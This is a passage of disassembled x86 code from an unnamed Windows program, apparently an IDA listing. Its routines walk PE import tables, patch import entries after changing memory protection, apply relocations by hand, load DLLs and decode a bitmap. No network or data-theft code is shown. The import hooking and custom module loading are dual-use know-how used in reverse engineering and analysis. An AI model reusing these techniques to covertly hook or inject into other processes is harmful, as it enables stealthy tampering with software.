dd 0FFFFFF1Ch, 0FF088D89h, 958BFFFFh, 0FFFFFF08h, 2FB3E852h
dd 0C4830000h
db 4
; ---------------------------------------------------------------------------
loc_418B1D: ; CODE XREF: _3:00418A0E�j
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 10h
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418B30 proc near ; CODE XREF: sub_418780+18C�p
; sub_418780+1AE�p ...
var_2C = dword ptr -2Ch
var_28 = byte ptr -28h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 2Ch
mov eax, ds:dword_424894
add eax, 1
mov ds:dword_424894, eax
mov ecx, [ebp+arg_4]
mov ds:dword_423BC0, ecx
push 9
lea ecx, [ebp+var_28]
call sub_41EA57
lea edx, [ebp+var_28]
push edx
push 0
mov eax, [ebp+arg_0]
push eax
call sub_418B90
add esp, 0Ch
mov ecx, ds:dword_424894
sub ecx, 1
mov ds:dword_424894, ecx
mov [ebp+var_2C], 1
lea ecx, [ebp+var_28]
call sub_41EB05
mov eax, [ebp+var_2C]
mov esp, ebp
pop ebp
retn 8
sub_418B30 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418B90 proc near ; CODE XREF: sub_418B30+30�p
; sub_418B90+24B�p
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_421458
push offset sub_4104E0
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFB8h
push ebx
push esi
push edi
mov [ebp+var_18], esp
cmp [ebp+arg_0], 0
jnz short loc_418BC1
jmp loc_418E7C
; ---------------------------------------------------------------------------
loc_418BC1: ; CODE XREF: sub_418B90+2A�j
mov eax, [ebp+arg_0]
mov [ebp+var_2C], eax
mov ecx, [ebp+arg_4]
mov [ebp+var_28], ecx
mov edx, [ebp+arg_4]
mov [ebp+var_30], edx
jmp short loc_418BDE
; ---------------------------------------------------------------------------
loc_418BD5: ; CODE XREF: sub_418B90:loc_418BF3�j
mov eax, [ebp+var_30]
mov ecx, [eax+4]
mov [ebp+var_30], ecx
loc_418BDE: ; CODE XREF: sub_418B90+43�j
cmp [ebp+var_30], 0
jz short loc_418BF5
mov edx, [ebp+var_30]
mov eax, [edx]
cmp eax, [ebp+arg_0]
jnz short loc_418BF3
jmp loc_418E7C
; ---------------------------------------------------------------------------
loc_418BF3: ; CODE XREF: sub_418B90+5C�j
jmp short loc_418BD5
; ---------------------------------------------------------------------------
loc_418BF5: ; CODE XREF: sub_418B90+52�j
mov ecx, [ebp+arg_0]
push ecx
mov ecx, [ebp+arg_8]
call sub_41EB4C
test eax, eax
jz short loc_418C0A
jmp loc_418E7C
; ---------------------------------------------------------------------------
loc_418C0A: ; CODE XREF: sub_418B90+73�j
mov edx, ds:dword_424894
add edx, 1
mov ds:dword_424894, edx
mov eax, [ebp+arg_0]
mov [ebp+var_34], eax
mov ecx, ds:dword_423BC0
mov [ebp+var_24], ecx
mov [ebp+var_4], 0
mov edx, [ebp+var_34]
mov eax, [ebp+var_34]
add eax, [edx+3Ch]
mov [ebp+var_38], eax
mov ecx, [ebp+var_38]
cmp dword ptr [ecx], 4550h
jnz loc_418E31
cmp ds:dword_424600, 1
jnz short loc_418C6A
cmp [ebp+arg_0], 80000000h
jbe short loc_418C6A
push 0
push 0
push 0
push 0
call ds:dword_4246F8 ; RaiseException
loc_418C6A: ; CODE XREF: sub_418B90+C1�j
; sub_418B90+CA�j
mov edx, [ebp+var_38]
mov eax, [ebp+var_34]
add eax, [edx+80h]
mov [ebp+var_20], eax
mov [ebp+var_4], 1
cmp ds:dword_424600, 1
jnz short loc_418D07
mov [ebp+var_40], 0
jmp short loc_418C9B
; ---------------------------------------------------------------------------
loc_418C92: ; CODE XREF: sub_418B90:loc_418D05�j
mov ecx, [ebp+var_40]
add ecx, 1
mov [ebp+var_40], ecx
loc_418C9B: ; CODE XREF: sub_418B90+100�j
mov edx, [ebp+var_38]
xor eax, eax
mov ax, [edx+6]
cmp [ebp+var_40], eax
jnb short loc_418D07
mov ecx, [ebp+var_38]
xor edx, edx
mov dx, [ecx+14h]
mov eax, [ebp+var_38]
lea ecx, [eax+edx+18h]
mov edx, [ebp+var_40]
imul edx, 28h
add ecx, edx
mov [ebp+var_44], ecx
mov eax, [ebp+var_44]
mov ecx, [ebp+var_34]
add ecx, [eax+0Ch]
cmp ecx, [ebp+var_20]
ja short loc_418D05
mov edx, [ebp+var_44]
mov eax, [ebp+var_34]
add eax, [edx+0Ch]
mov ecx, [ebp+var_44]
add eax, [ecx+8]
cmp [ebp+var_20], eax
ja short loc_418D05
mov edx, [ebp+var_44]
mov eax, [edx+24h]
and eax, 10000000h
test eax, eax
jz short loc_418D03
push 0
push 0
push 0
push 0
call ds:dword_4246F8 ; RaiseException
loc_418D03: ; CODE XREF: sub_418B90+163�j
jmp short loc_418D07
; ---------------------------------------------------------------------------
loc_418D05: ; CODE XREF: sub_418B90+140�j
; sub_418B90+154�j
jmp short loc_418C92
; ---------------------------------------------------------------------------
loc_418D07: ; CODE XREF: sub_418B90+F7�j
; sub_418B90+117�j ...
mov [ebp+var_4], 0
jmp short loc_418D2E
; ---------------------------------------------------------------------------
loc_418D10: ; DATA XREF: _4:00421468�o
mov ecx, [ebp+var_14]
mov edx, [ecx]
mov eax, [edx]
mov [ebp+var_58], eax
mov eax, [ebp+var_58]
neg eax
sbb eax, eax
neg eax
retn
; ---------------------------------------------------------------------------
loc_418D24: ; DATA XREF: _4:0042146C�o
mov esp, [ebp+var_18]
mov [ebp+var_4], 0
loc_418D2E: ; CODE XREF: sub_418B90+17E�j
mov ecx, [ebp+var_38]
mov eax, [ecx+84h]
xor edx, edx
mov ecx, 14h
div ecx
mov [ebp+var_1C], eax
mov [ebp+var_3C], 0
jmp short loc_418D55
; ---------------------------------------------------------------------------
loc_418D4C: ; CODE XREF: sub_418B90:loc_418E2C�j
mov edx, [ebp+var_3C]
add edx, 1
mov [ebp+var_3C], edx
loc_418D55: ; CODE XREF: sub_418B90+1BA�j
mov eax, [ebp+var_3C]
cmp eax, [ebp+var_1C]
jnb loc_418E31
mov ecx, [ebp+var_3C]
imul ecx, 14h
mov edx, [ebp+var_20]
mov eax, [ebp+var_34]
add eax, [edx+ecx+0Ch]
mov [ebp+var_50], eax
mov ecx, [ebp+var_3C]
imul ecx, 14h
mov edx, [ebp+var_20]
cmp dword ptr [edx+ecx+0Ch], 0
jz short loc_418D9D
mov eax, [ebp+var_3C]
imul eax, 14h
mov ecx, [ebp+var_20]
mov edx, [ecx+eax+0Ch]
mov eax, [ebp+var_34]
xor ecx, ecx
mov cl, [eax+edx]
test ecx, ecx
jnz short loc_418DA2
loc_418D9D: ; CODE XREF: sub_418B90+1F2�j
jmp loc_418E31
; ---------------------------------------------------------------------------
loc_418DA2: ; CODE XREF: sub_418B90+20B�j
mov edx, [ebp+var_3C]
imul edx, 14h
mov eax, [ebp+var_20]
mov ecx, [ebp+var_34]
add ecx, [eax+edx+10h]
mov [ebp+var_48], ecx
mov edx, [ebp+var_50]
push edx
call sub_41E254
mov [ebp+var_4C], eax
mov eax, [ebp+var_50]
mov ds:dword_423BC0, eax
cmp [ebp+var_4C], 0
jz short loc_418DE3
mov ecx, [ebp+arg_8]
push ecx
lea edx, [ebp+var_2C]
push edx
mov eax, [ebp+var_4C]
push eax
call sub_418B90
add esp, 0Ch
loc_418DE3: ; CODE XREF: sub_418B90+23D�j
push 0
call ds:dword_424698 ; GetModuleHandleA
cmp eax, [ebp+arg_0]
jz short loc_418E2C
mov ecx, [ebp+var_4C]
push ecx
mov ecx, ds:dword_429038
call sub_41EB4C
test eax, eax
jz short loc_418E2C
jmp short loc_418E0E
; ---------------------------------------------------------------------------
loc_418E05: ; CODE XREF: sub_418B90+29A�j
mov edx, [ebp+var_48]
add edx, 4
mov [ebp+var_48], edx
loc_418E0E: ; CODE XREF: sub_418B90+273�j
mov eax, [ebp+var_48]
cmp dword ptr [eax], 0
jz short loc_418E2C
mov ecx, [ebp+var_50]
push ecx
mov edx, [ebp+var_24]
push edx
mov eax, [ebp+var_48]
push eax
call sub_418E90
add esp, 0Ch
jmp short loc_418E05
; ---------------------------------------------------------------------------
loc_418E2C: ; CODE XREF: sub_418B90+25E�j
; sub_418B90+271�j ...
jmp loc_418D4C
; ---------------------------------------------------------------------------
loc_418E31: ; CODE XREF: sub_418B90+B4�j
; sub_418B90+1CB�j ...
push 1
mov ecx, [ebp+arg_0]
push ecx
mov ecx, [ebp+arg_8]
call sub_41EC69
mov [ebp+var_4], 0FFFFFFFFh
jmp short loc_418E65
; ---------------------------------------------------------------------------
mov edx, [ebp+var_14]
mov eax, [edx]
mov ecx, [eax]
mov [ebp+var_54], ecx
mov eax, [ebp+var_54]
neg eax
sbb eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
mov [ebp+var_4], 0FFFFFFFFh
loc_418E65: ; CODE XREF: sub_418B90+2B6�j
mov eax, [ebp+var_24]
mov ds:dword_423BC0, eax
mov ecx, ds:dword_424894
sub ecx, 1
mov ds:dword_424894, ecx
loc_418E7C: ; CODE XREF: sub_418B90+2C�j
; sub_418B90+5E�j ...
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_418B90 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418E90 proc near ; CODE XREF: sub_4184A0+250�p
; sub_418B90+292�p
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
mov [ebp+var_4], 0
cmp ds:dword_429034, 0
jnz short loc_418EB0
mov ecx, 0EF00000Ah
call sub_41BA32
loc_418EB0: ; CODE XREF: sub_418E90+14�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
push ecx
mov ecx, ds:dword_429034
call sub_41EB4C
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_418F0F
lea edx, [ebp+var_10]
push edx
push 4
push 4
mov eax, [ebp+arg_0]
push eax
call ds:dword_42472C ; VirtualProtect
test eax, eax
jnz short loc_418EEA
mov ecx, 0EF00000Bh
call sub_41BA32
loc_418EEA: ; CODE XREF: sub_418E90+4E�j
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8]
mov eax, [edx]
mov [ecx], eax
lea ecx, [ebp+var_C]
push ecx
mov edx, [ebp+var_10]
push edx
push 4
mov eax, [ebp+arg_0]
push eax
call ds:dword_42472C ; VirtualProtect
mov [ebp+var_4], 1
loc_418F0F: ; CODE XREF: sub_418E90+38�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_418E90 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418F16 proc near ; CODE XREF: sub_410386+23�p
; sub_413056+A5�p
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = byte ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = byte ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = word ptr -28h
var_26 = dword ptr -26h
var_1E = dword ptr -1Eh
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_421470
push offset sub_4104E0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 6Ch
push ebx
push esi
push edi
and [ebp+var_30], 0
and [ebp+var_2C], 0
and [ebp+var_4], 0
and [ebp+var_3C], 0
lea eax, [ebp+var_34]
push eax
push 0
lea eax, [ebp+var_3C]
push eax
push 0Eh
lea eax, [ebp+var_28]
push eax
push [ebp+arg_0]
call sub_415175
test eax, eax
jz short loc_418F77
lea eax, [ebp+var_44]
push eax
push [ebp+arg_0]
call sub_414670
test eax, eax
jnz short loc_418F90
loc_418F77: ; CODE XREF: sub_418F16+4F�j
push 0FFFFFFFFh
and [ebp+var_64], 0
lea eax, [ebp+var_10]
push eax
call sub_41042A
pop ecx
pop ecx
mov eax, [ebp+var_64]
jmp loc_41919C
; ---------------------------------------------------------------------------
loc_418F90: ; CODE XREF: sub_418F16+5F�j
movzx eax, [ebp+var_28]
cmp eax, 4D42h
jnz short loc_418FF4
mov eax, [ebp+var_26]
cmp eax, [ebp+var_44]
ja short loc_418FF4
mov eax, [ebp+var_26]
sub eax, 0Eh
push eax
call sub_41BA4A
pop ecx
mov [ebp+var_5C], eax
mov eax, [ebp+var_5C]
mov [ebp+var_30], eax
lea eax, [ebp+var_48]
push eax
push 0
lea eax, [ebp+var_3C]
push eax
mov eax, [ebp+var_26]
sub eax, 0Eh
push eax
push [ebp+var_30]
push [ebp+arg_0]
call sub_415175
test eax, eax
jnz short loc_418FF2
push 0FFFFFFFFh
and [ebp+var_68], 0
lea eax, [ebp+var_10]
push eax
call sub_41042A
pop ecx
pop ecx
mov eax, [ebp+var_68]
jmp loc_41919C
; ---------------------------------------------------------------------------
loc_418FF2: ; CODE XREF: sub_418F16+C1�j
jmp short loc_41900D
; ---------------------------------------------------------------------------
loc_418FF4: ; CODE XREF: sub_418F16+83�j
; sub_418F16+8B�j
push 0FFFFFFFFh
and [ebp+var_6C], 0
lea eax, [ebp+var_10]
push eax
call sub_41042A
pop ecx
pop ecx
mov eax, [ebp+var_6C]
jmp loc_41919C
; ---------------------------------------------------------------------------
loc_41900D: ; CODE XREF: sub_418F16:loc_418FF2�j
mov eax, [ebp+var_30]
mov eax, [eax]
mov [ebp+var_38], eax
mov eax, [ebp+var_30]
cmp dword ptr [eax+10h], 0
jz short loc_419037
push 0FFFFFFFFh
and [ebp+var_70], 0
lea eax, [ebp+var_10]
push eax
call sub_41042A
pop ecx
pop ecx
mov eax, [ebp+var_70]
jmp loc_41919C
; ---------------------------------------------------------------------------
loc_419037: ; CODE XREF: sub_418F16+106�j
push 0
call ds:dword_424760 ; CreateCompatibleDC
mov [ebp+var_2C], eax
cmp [ebp+var_2C], 0
jnz short loc_419061
push 0FFFFFFFFh
and [ebp+var_74], 0
lea eax, [ebp+var_10]
push eax
call sub_41042A
pop ecx
pop ecx
mov eax, [ebp+var_74]
jmp loc_41919C
; ---------------------------------------------------------------------------
loc_419061: ; CODE XREF: sub_418F16+130�j
mov eax, [ebp+var_1E]
mov ecx, [ebp+var_30]
lea eax, [ecx+eax-0Eh]
mov [ebp+var_40], eax
and [ebp+var_4C], 0
and [ebp+var_54], 0
mov eax, [ebp+var_30]
movzx eax, word ptr [eax+0Eh]
mov [ebp+var_78], eax
cmp [ebp+var_78], 8
jz short loc_4190B5
cmp [ebp+var_78], 10h
jz short loc_4190AC
cmp [ebp+var_78], 18h
jz short loc_4190A3
cmp [ebp+var_78], 20h
jz short loc_41909A
jmp short loc_4190BE
; ---------------------------------------------------------------------------
loc_41909A: ; CODE XREF: sub_418F16+180�j
mov [ebp+var_4C], 4
jmp short loc_4190D7
; ---------------------------------------------------------------------------
loc_4190A3: ; CODE XREF: sub_418F16+17A�j
mov [ebp+var_4C], 3
jmp short loc_4190D7
; ---------------------------------------------------------------------------
loc_4190AC: ; CODE XREF: sub_418F16+174�j
mov [ebp+var_4C], 2
jmp short loc_4190D7
; ---------------------------------------------------------------------------
loc_4190B5: ; CODE XREF: sub_418F16+16E�j
mov [ebp+var_4C], 1
jmp short loc_4190D7
; ---------------------------------------------------------------------------
loc_4190BE: ; CODE XREF: sub_418F16+182�j
push 0FFFFFFFFh
and [ebp+var_7C], 0
lea eax, [ebp+var_10]
push eax
call sub_41042A
pop ecx
pop ecx
mov eax, [ebp+var_7C]
jmp loc_41919C
; ---------------------------------------------------------------------------
loc_4190D7: ; CODE XREF: sub_418F16+18B�j
; sub_418F16+194�j ...
push 0
push 0
lea eax, [ebp+var_58]
push eax
push 0
push [ebp+var_30]
push [ebp+var_2C]
call ds:dword_424764 ; CreateDIBSection
mov [ebp+var_54], eax
cmp [ebp+var_54], 0
jnz short loc_41910F
push 0FFFFFFFFh
and [ebp+var_80], 0
lea eax, [ebp+var_10]
push eax
call sub_41042A
pop ecx
pop ecx
mov eax, [ebp+var_80]
jmp loc_41919C
; ---------------------------------------------------------------------------
loc_41910F: ; CODE XREF: sub_418F16+1DE�j
mov eax, [ebp+var_30]
mov eax, [eax+4]
imul eax, [ebp+var_4C]
mov [ebp+var_50], eax
mov eax, [ebp+var_50]
cdq
push 4
pop ecx
idiv ecx
test edx, edx
jz short loc_41913F
mov eax, [ebp+var_50]
cdq
push 4
pop ecx
idiv ecx
push 4
pop eax
sub eax, edx
mov ecx, [ebp+var_50]
add ecx, eax
mov [ebp+var_50], ecx
loc_41913F: ; CODE XREF: sub_418F16+211�j
mov eax, [ebp+var_30]
mov ecx, [ebp+var_50]
imul ecx, [eax+8]
mov esi, [ebp+var_40]
mov edi, [ebp+var_58]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 0FFFFFFFFh
mov eax, [ebp+var_54]
mov [ebp+var_84], eax
lea eax, [ebp+var_10]
push eax
call sub_41042A
pop ecx
pop ecx
mov eax, [ebp+var_84]
jmp short loc_41919C
; ---------------------------------------------------------------------------
loc_41917B: ; DATA XREF: _4:00421478�o
cmp [ebp+var_2C], 0
jz short loc_41918A
push [ebp+var_2C]
call ds:dword_424768 ; DeleteDC
loc_41918A: ; CODE XREF: sub_418F16+269�j
mov eax, [ebp+var_30]
mov [ebp+var_60], eax
push [ebp+var_60]
call sub_41BACD
pop ecx
retn
; ---------------------------------------------------------------------------
xor eax, eax
loc_41919C: ; CODE XREF: sub_418F16+75�j
; sub_418F16+D7�j ...
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_418F16 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4191AB proc near ; CODE XREF: sub_41925C+86�p
; sub_419995+CD�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
and [ebp+var_8], 0
and [ebp+var_4], 0
movzx eax, ds:byte_424614
test eax, eax
jnz short loc_419209
push offset dword_423C60
lea edx, [ebp+var_4]
mov ecx, [ebp+arg_0]
call sub_415977
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_4191F0
push offset dword_423C60
lea edx, [ebp+var_4]
mov ecx, [ebp+arg_0]
call sub_415867
mov [ebp+var_8], eax
loc_4191F0: ; CODE XREF: sub_4191AB+30�j
cmp [ebp+var_8], 0
jnz short loc_419209
mov eax, [ebp+var_4]
mov [ebp+var_C], eax
push [ebp+var_C]
call sub_41BACD
pop ecx
and [ebp+var_4], 0
loc_419209: ; CODE XREF: sub_4191AB+17�j
; sub_4191AB+49�j
cmp [ebp+arg_4], 0
jz short loc_419219
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
mov [eax], ecx
jmp short loc_419228
; ---------------------------------------------------------------------------
loc_419219: ; CODE XREF: sub_4191AB+62�j
mov eax, [ebp+var_4]
mov [ebp+var_10], eax
push [ebp+var_10]
call sub_41BACD
pop ecx
loc_419228: ; CODE XREF: sub_4191AB+6C�j
mov eax, [ebp+var_8]
leave
retn
sub_4191AB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41922D proc near ; CODE XREF: sub_419529+41�p
; sub_419529+227�p ...
push ebp
mov ebp, esp
cmp ds:dword_4248BC, 0
jnz short loc_41924F
push offset aKernel32_dll ; "kernel32.dll"
push offset aGetcurrentpr_0 ; "GetCurrentProcessId"
call sub_41D300
pop ecx
pop ecx
mov ds:dword_4248BC, eax
loc_41924F: ; CODE XREF: sub_41922D+A�j
call ds:dword_4248BC
xor eax, 0CABEFA10h
pop ebp
retn
sub_41922D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41925C proc near ; CODE XREF: sub_419424+C�p
; sub_41E254+2B�p
var_28 = byte ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 28h
mov [ebp+var_28], dl
mov [ebp+var_24], ecx
push offset sub_41EDE8
push ds:dword_424740
push [ebp+var_24]
mov ecx, ds:dword_4248B4
call sub_41EB6C
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_4192DB
movzx eax, [ebp+var_28]
test eax, eax
jz short loc_4192D3
push 104h
call sub_41BA4A
pop ecx
mov [ebp+var_18], eax
mov eax, [ebp+var_18]
mov [ebp+var_10], eax
push 104h
push [ebp+var_10]
push [ebp+var_C]
call ds:dword_424694 ; GetModuleFileNameA
test eax, eax
jz short loc_4192C4
push [ebp+var_10]
call ds:dword_4246DC ; LoadLibraryA
loc_4192C4: ; CODE XREF: sub_41925C+5D�j
mov eax, [ebp+var_10]
mov [ebp+var_1C], eax
push [ebp+var_1C]
call sub_41BACD
pop ecx
loc_4192D3: ; CODE XREF: sub_41925C+34�j
mov eax, [ebp+var_C]
jmp locret_419391
; ---------------------------------------------------------------------------
loc_4192DB: ; CODE XREF: sub_41925C+2C�j
push 0
push 0
push [ebp+var_24]
call sub_4191AB
add esp, 0Ch
mov [ebp+var_8], eax
and [ebp+var_4], 0
cmp [ebp+var_8], 0
jz short loc_41933D
push 0
push 0
push [ebp+var_8]
call sub_41BF82
add esp, 0Ch
mov [ebp+var_14], eax
push [ebp+var_14]
call ds:dword_424698 ; GetModuleHandleA
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_41932C
movzx eax, [ebp+var_28]
test eax, eax
jz short loc_41932C
push [ebp+var_14]
call ds:dword_4246DC ; LoadLibraryA
loc_41932C: ; CODE XREF: sub_41925C+BD�j
; sub_41925C+C5�j
mov eax, [ebp+var_14]
mov [ebp+var_20], eax
push [ebp+var_20]
call sub_41BACD
pop ecx
jmp short loc_41938E
; ---------------------------------------------------------------------------
loc_41933D: ; CODE XREF: sub_41925C+99�j
push [ebp+var_24]
call ds:dword_424698 ; GetModuleHandleA
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_41938E
movzx eax, [ebp+var_28]
test eax, eax
jz short loc_41938E
push [ebp+var_24]
call ds:dword_4246DC ; LoadLibraryA
push [ebp+var_24]
push [ebp+var_4]
call sub_418B30
test eax, eax
jnz short loc_41938E
call ds:dword_424690 ; RtlGetLastWin32Error
test eax, eax
jnz short loc_419381
push 7Eh
call ds:dword_42470C ; RtlRestoreLastWin32Error
loc_419381: ; CODE XREF: sub_41925C+11B�j
push [ebp+var_4]
call ds:dword_424660 ; FreeLibrary
and [ebp+var_4], 0
loc_41938E: ; CODE XREF: sub_41925C+DF�j
; sub_41925C+F1�j ...
mov eax, [ebp+var_4]
locret_419391: ; CODE XREF: sub_41925C+7A�j
leave
retn
sub_41925C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419393 proc near ; CODE XREF: sub_41E33E+53�p
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00419415 SIZE 0000000F BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_421480
push offset sub_4104E0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 10h
push ebx
push esi
push edi
mov [ebp+var_28], ecx
push 105h
call sub_41BA4A
pop ecx
mov [ebp+var_20], eax
mov eax, [ebp+var_20]
mov [ebp+var_1C], eax
push 41h
pop ecx
xor eax, eax
mov edi, [ebp+var_1C]
rep stosd
stosb
and [ebp+var_4], 0
push 104h
push [ebp+var_1C]
push [ebp+var_28]
call ds:dword_424694 ; GetModuleFileNameA
push [ebp+var_1C]
push [ebp+var_28]
call sub_418B30
or [ebp+var_4], 0FFFFFFFFh
call sub_419405
jmp short loc_419415
sub_419393 endp
; =============== S U B R O U T I N E =======================================
sub_419405 proc near ; CODE XREF: sub_419393+6B�p
; DATA XREF: _4:00421488�o
mov eax, [ebp-1Ch]
mov [ebp-24h], eax
push dword ptr [ebp-24h]
call sub_41BACD
pop ecx
retn
sub_419405 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_419393
loc_419415: ; CODE XREF: sub_419393+70�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; END OF FUNCTION CHUNK FOR sub_419393
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419424 proc near ; CODE XREF: sub_41E119+7�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov dl, 1
mov ecx, [ebp+var_4]
call sub_41925C
leave
retn
sub_419424 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419437 proc near ; CODE XREF: sub_419995+362�p
; sub_419995+576�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
xor edx, edx
div [ebp+arg_4]
mov [ebp+var_4], edx
cmp [ebp+var_4], 0
jz short loc_419457
mov eax, [ebp+arg_0]
add eax, [ebp+arg_4]
sub eax, [ebp+var_4]
jmp short locret_41945A
; ---------------------------------------------------------------------------
loc_419457: ; CODE XREF: sub_419437+13�j
mov eax, [ebp+arg_0]
locret_41945A: ; CODE XREF: sub_419437+1E�j
leave
retn
sub_419437 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41945C proc near ; CODE XREF: sub_419529+153�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 24h
mov eax, [ebp+arg_0]
add eax, [ebp+arg_8]
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
add eax, [ebp+arg_8]
add eax, [ebp+arg_C]
mov [ebp+var_8], eax
loc_419477: ; CODE XREF: sub_41945C:loc_419522�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_8]
jnb locret_419527
mov eax, [ebp+var_4]
mov eax, [eax]
mov [ebp+var_14], eax
mov eax, [ebp+var_4]
add eax, 4
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov eax, [eax]
mov [ebp+var_10], eax
mov eax, [ebp+var_4]
add eax, 4
mov [ebp+var_4], eax
mov eax, [ebp+var_10]
sub eax, 8
mov [ebp+var_10], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
loc_4194B7: ; CODE XREF: sub_41945C+8B�j
; sub_41945C+C4�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_C]
jnb short loc_419522
mov eax, [ebp+var_4]
movzx eax, word ptr [eax]
and eax, 0FFFh
mov [ebp+var_24], eax
mov eax, [ebp+var_4]
movzx eax, word ptr [eax]
sar eax, 0Ch
mov [ebp+var_1C], eax
mov eax, [ebp+var_4]
inc eax
inc eax
mov [ebp+var_4], eax
cmp [ebp+var_1C], 0
jnz short loc_4194E9
jmp short loc_4194B7
; ---------------------------------------------------------------------------
loc_4194E9: ; CODE XREF: sub_41945C+89�j
cmp [ebp+var_1C], 3
jz short loc_4194F9
mov ecx, 0EF000016h
call sub_41BA32
loc_4194F9: ; CODE XREF: sub_41945C+91�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_14]
add eax, [ebp+var_24]
mov [ebp+var_20], eax
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_0]
sub ecx, [eax+34h]
mov eax, [ebp+var_20]
mov eax, [eax]
add eax, ecx
mov [ebp+var_18], eax
mov eax, [ebp+var_20]
mov ecx, [ebp+var_18]
mov [eax], ecx
jmp short loc_4194B7
; ---------------------------------------------------------------------------
loc_419522: ; CODE XREF: sub_41945C+61�j
jmp loc_419477
; ---------------------------------------------------------------------------
